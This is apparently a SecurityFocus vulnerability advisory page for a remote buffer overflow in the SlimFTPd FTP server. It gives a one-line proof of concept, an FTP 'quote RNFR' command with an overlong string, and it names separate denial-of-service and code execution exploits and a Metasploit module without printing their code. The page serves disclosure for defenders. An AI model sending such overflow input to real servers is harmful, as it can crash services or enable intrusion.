Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability

A proof of concept example is available:

ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345

A proof of concept denial of service exploit (47slimftpd_bof.pl) was provided by Dim K0r0l <dim@acolytez.com>.

A proof of concept remote code execution exploit (redslim-slimftpd.c) was provided by redsand <redsand@redsand.net>:

The slimftpd_list_concat.pm exploit is available for Metasploit.







 

Privacy Statement
Copyright 2009, SecurityFocus